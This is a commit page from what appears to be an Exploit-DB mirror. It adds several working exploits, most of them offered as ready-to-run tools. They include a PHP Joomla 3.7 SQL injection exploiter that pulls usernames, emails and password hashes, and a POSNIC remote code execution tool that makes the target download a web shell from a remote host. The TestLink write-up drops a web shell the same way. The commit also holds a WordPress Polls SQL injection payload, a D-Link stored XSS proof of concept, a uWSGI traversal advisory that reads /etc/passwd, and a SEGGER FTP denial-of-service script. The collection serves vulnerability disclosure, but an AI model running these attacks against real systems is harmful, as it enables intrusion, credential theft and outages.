bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-03

Browse source 
13 changes to exploits/shellcodes

SEGGER embOS/IP FTP Server 3.22 - Denial of Service
DualDesk 20 - 'Proxy.exe' Denial of Service

Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak
Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'

Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'

ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow
ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow

Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)
Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader

IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)

IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)

Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)

ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow

Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak
Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation 'Jailbreak'

Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)
Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55
TestLink Open Source Test Management < 1.9.16 - Remote Code Execution
Joomla! 3.7 - SQL Injection
Posnic Stock Management System - SQL Injection
WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)

WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection
WordPress Plugin UPM Polls 1.0.4 - Blind SQL Injection
D-Link DIR-600M Wireless - Cross-Site Scripting
uWSGI < 2.0.17 - Directory Traversal
This commit is contained in:
Offensive Security 2018-03-03 05:01:47 +00:00
parent b42c3d0ecd
commit ba1d29bdd6
14 changed files with 1507 additions and 128 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/hardware/webapps/44219.txt Normal file
View file

@ -0,0 +1,22 @@
########################################################################
# Exploit Title: D-Link DIR-600M Wireless - Persistent Cross Site Scripting
# Date: 11.02.2018
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Category: Hardware
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Hardware Version: C1
# Firmware version: 3.01
# Tested on: Linux Mint
# CVE: CVE-2018-6936
##########################################################################
Reproduction Steps:
- Goto your wifi router gateway [i.e: http://192.168.0.1]
- Go to --> "Maintainence" --> "Admin"
- Create a user with name "<script>alert("PKP")</script>"
- Refresh the page and you will be having "PKP" popup
Note: It can also be done by changing SSID name to "<script>alert("PKP")</script>"

68
exploits/php/remote/44226.txt Normal file
View file

@ -0,0 +1,68 @@
# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046)
Vendor Home Page: http://testlink.org
Disovered At: Indishell Lab
CVE ID: CVE-2018-7466
///////////
//OverView
///////////
Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution.
Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in "TestLink DB login" field.
After successful installation, PHP code will get save in config file.
Exploitation
During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.
Script save MySQL server host, username and password in config file.
Here attacker can take advantage of this process to write PHP code in config file.
To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).
To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps
-> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line
skip-networking
to
# skip-networking
and
bind-address = some_ip
to
#bind-address = some_ip
save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP
Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script.
When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"
Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name
"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
It will dump PHP web shell in base directory with name ica.php.
![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/TestLink%20-below%201.9.17-%20Remote%20Code%20Execution/testlink%20POC.png)
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
--==[[Love to]]==--
My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

276
exploits/php/remote/44227.php Normal file
View file

@ -0,0 +1,276 @@
<?php
session_start();
error_reporting(0);
set_time_limit(0);
/* Coded By Manish At Indishell Lab*/
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #333333;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms">--==[[ Mannu ]]==--</font><br><font color=#ff9933 size=3 face="comic sans ms">--==[[ Joomla </font><font color=white size=3 face="comic sans ms">SQL Injection exploiter By Team </font><font color=green size=3 face="comic sans ms"> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
Hackuin,Alicks,mike waals<br>cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash<br>
<font color=white>--==[[Love to]]==--</font><br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)<br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table>
';
function unhex($hex){
for($i=0;$i<strlen($hex);$i+=2)
$str .= chr(hexdec(substr($hex,$i,2)));
return $str;
}
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
?>
<div align=center>
<img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-cool21.gif">
<font size=4 color=white face="comic sans ms">--==[[ code for India ]]==-- </font>
<img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-flag010.gif">
<br><br>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="Exploit it">
</form>
<?php
if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$inject=$target.'/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=';
$payload='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,hex(table_name),0x7e7e7e)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1)))=1';
$final_url=$inject.$payload;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$def=trim($de1[0]);
$table_name=unhex($def);
echo 'Table names used for grabbing database table prefix ->'.$table_name;
echo '<br>';
$prefix=explode('_',$table_name);
$total_char=10;
$start=1;
$loop_end=false;
while($loop_end!=true)
{
$payload2='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(password,'.$start.','.$total_char.'),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$payload2;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$ddd.=trim($de1[0]);
if(trim($de1[0])=='')
{
break;
$loop_end=true;
}
$i=$i+1;
$start=$start+10;
}
$username='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(username,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$username;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$user_name=trim($de1[0]);
$email='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(email,1,20),0x7e7e7e)/**/from/**/'.$prefix[0].'_users/**/limit/**/0,1)))=1';
$final_url=$inject.$email;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$email=trim($de1[0]);
$dbuser='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(user(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbuser;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_user=trim($de1[0]);
$dbname='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(database(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbname;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_name=trim($de1[0]);
$dbversion='1,extractvalue(0x0a,concat(0x0a,(select/**/concat(0x7e7e7e,substring(version(),1,20),0x7e7e7e))))=1';
$final_url=$inject.$dbversion;
$data_extracted=data($final_url);
$de0=explode("~~~", $data_extracted);
$de1=explode("~~~", $de0[1]);
$db_version=trim($de1[0]);
if($email!='' || $user_name!='' || $ddd!='')
{
echo 'Target <a href="'.$target.'">'.$target.'</a> has been injected successfully, find username, email and password given below<br><br>';
echo '<table width=80% style="border:0px; background-color : transparent;">';
echo '<tr><td align=right width=20%>Database username is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_user;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Database name is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_name;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Database version is -> </td><td align=left width=80%><font color=#f9e79f>'.$db_version;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Username is -> </td><td align=left width=80%><font color=#f9e79f>'.$user_name;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Email is -> </td><td align=left width=80%><font color=#f9e79f>'.$email;
echo '</font></td></tr>';
echo '<tr><td align=right width=20%>Password hash is -> </td><td align=left width=80%><font color=#f9e79f>'.$ddd;
echo '</font></td></tr></table>';
}
}
?>

242
exploits/php/remote/44228.php Normal file
View file

@ -0,0 +1,242 @@
<?php
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[IndiSh3LL]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ POSNIC, PHP stock </font><font color=white size=5 face="comic sans ms"><b>management script Remote code </font><font color=green size=5 face="comic sans ms"><b>execution exploiter ]==--</font><br><font color=white size=5 face="comic sans ms">--==[[ With Love from Team Indishell]]==--</br></font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
--==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP,
Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)<br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table>
';
echo '<div align=center>
<font size=4 color=white face="comic sans ms"><img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-cool21.gif"> --==[[ code for India,Hack for India,Die for India ]]==-- <img src="https://web.archive.org/web/20160206014924/http://www.freesmileys.org/smileys/smiley-flag010.gif"></font>
<br>Please <a href="https://github.com/incredibleindishell/exploit-code-by-me/tree/master/POSNIC">Read it</a> before using this code.<br><br>
<form method=post>
target URL: -<input type=text name=tar>
<br><br>Attacker controled Remote MySQL host: - <input type=text name=mhost value="attacker_controlled MYSQL server IP">
<br><br>Attacker controled Remote MySQL account username: - <input type=text name=muser>
<br><br>
<input type=submit name=launch value="Chal Billu, own the shit 8-)">
</form>';
function request($lu,$payload)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec ($ch);
curl_close ($ch);
}
function shell_check($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_NOBODY, true);
$result = curl_exec($curl);
$ret = false;
if ($result !== false) {
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
function access($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['launch']))
{
$tar=$_POST['tar'];
$mhost=trim($_POST['mhost']);
$muser=trim($_POST['muser']);
$injecturl=$tar.'/setup_page.php';
$exploiturl=$tar.'/config.php';
/////////////////////////////////////
//here, we are injecting config file
/////////////////////////////////////
$hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL";
request($injecturl,$hex_it);
/////////////////////////////////////////
///Her we go, let's dump shell on server
////////////////////////////////////////
$code='<?php
function access($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, \'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8\');
$result[\'EXE\'] = curl_exec($ch);
curl_close($ch);
return $result[\'EXE\'];
}
$shell=access("https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php");
file_put_contents("ica.php",$shell);
?>';
$post_request='2=mannu.php&3='.$code;
request($exploiturl,$post_request);
access($tar.'/mannu.php');
$shell_link=shell_check($tar.'/ica.php');
if($shell_link==True)
{
echo 'check your shell at <a href="'.$tar.'/ica.php">This link </a>';
}
}
?>

38
exploits/php/remote/44229.txt Normal file
View file

@ -0,0 +1,38 @@
<b>Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability</b>
<br>
Vulnerable version:<=1.2.4
<br>Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
////////////////////////
<br>/// Overview:
<br>////////////////////////
<br>
<br>WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
////////////////
<br>
/// POC ////
<br>
///////////////
<br>
SQL Injection payload to enumerate tables
<br>----------------------------------------------
<br>http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
<br><b>Post data</b>
<br>question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
POC<br>
<img src="https://github.com/incredibleindishell/exploit-code-by-me/blob/master/WordPress%20Polls%20plugin-1.2.4-%20SQL%20Injection%20vulnerability/injected.png?raw=true">
<br>
--==[[ Greetz To ]]==--
Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
<br>Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
<br>Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
<br>Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
<br>
--==[[ Love To ]]==--
<br>My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
<br>Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)

76
exploits/php/webapps/44223.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: uWSGI PHP Plugin Directory Traversal
# Date: 01-03-2018
# Exploit Author: Marios Nicolaides - RUNESEC
# Reviewers: Simon Loizides and Nicolas Markitanis - RUNESEC
# Vendor Homepage: https://uwsgi-docs.readthedocs.io
# Affected Software: uWSGI PHP Plugin before 2.0.17
# Tested on: uWSGI 2.0.12 and 2.0.15
# CVE: CVE-2018-7490
# Category: Web Application
OVERVIEW
--------
The uWSGI PHP plugin before 2.0.17 is vulnerable to Directory Traversal when used without specifying the "php-allowed-docroot" option.
The vulnerability exists due to improper validation of the file path when requesting a resource under the DOCUMENT_ROOT directory which is specified via "php-docroot".
A remote attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f").
This was tested on uWSGI 2.0.12 and 2.0.15. All versions before 2.0.17 are affected.
DETAILS
-------
The documentation of uWSGI states that the php-docroot option is used to jail our php environment to a project directory (http://uwsgi-docs.readthedocs.io/en/latest/PHP.html#run-php-apps-without-a-frontend-server).
; jail our php environment to project_dir
php-docroot = %(project_dir)
During testing it was observed that uWSGI was affected by a Directory Traversal vulnerability when executed as a standalone (without a front-end web server) along with the "php-docroot" option to enforce the DOCUMENT_ROOT of the web application.
uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-docroot /home/testing/webapp/
An attacker could exploit this vulnerability by using path traversal sequences ("..%2f") to access sensitive information as demonstrated below:
http://example.runesec.com:1337/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error:
[uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path
However, the contents of the requested file (i.e., /etc/passwd) were still returned to the user.
After searching the web for possible solutions, we noticed that the "php-allowed-docroot" option was previously added to uWSGI for better security and could be used to list the allowed document roots but no further details were available (http://lists.unbit.it/pipermail/uwsgi/2011-December/003180.html).
Upon further testing, we observed that when the "php-allowed-docroot" was used instead of the "php-docroot" option, it was not affected by Directory Traversal attacks.
uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-allowed-docroot /home/testing/webapp/
After a very constructive and helpful talk with the uWSGI Project, they released an update which enforces a DOCUMENT_ROOT check when using the "php-docroot" option to prevent Directory Traversal attacks. Please see the MITIGATION section for more information.
IMPACT
------
An attacker could exploit this vulnerability to gain unauthorized read access to sensitive files located outside of the web root directory.
MITIGATION
----------
It is recommended to update to uWSGI 2.0.17 - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
REFERENCES
----------
https://blog.runesec.com/2018/03/01/uwsgi-path-traversal/
https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
https://nvd.nist.gov/vuln/detail/CVE-2018-7490
https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
TIMELINE
--------
26 June 2017 - uWSGI Project informed about the issue
26 February 2018 - uWSGI Project released a patch
1 March 2018 - Exploit publicly disclosed

5
exploits/windows/dos/42341.c
View file

@ -1,3 +1,8 @@
/*
Sync Breeze Enterprise BOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
*/
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define DEFAULT_BUFLEN 512

105
exploits/windows/dos/44221.py Executable file
View file

@ -0,0 +1,105 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security
Vendor:
=============
www.segger.com
Product:
===========
embOS/IP FTP Server v3.22
Vulnerability Type:
===================
FTP Commands Denial Of Service
CVE Reference:
==============
CVE-2018-7449
Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
TELNET x.x.x.x 21
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
CRASH!!!
Exploit/POC:
=============
import socket,time
VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n")
print s.recv(1024)
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024)
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
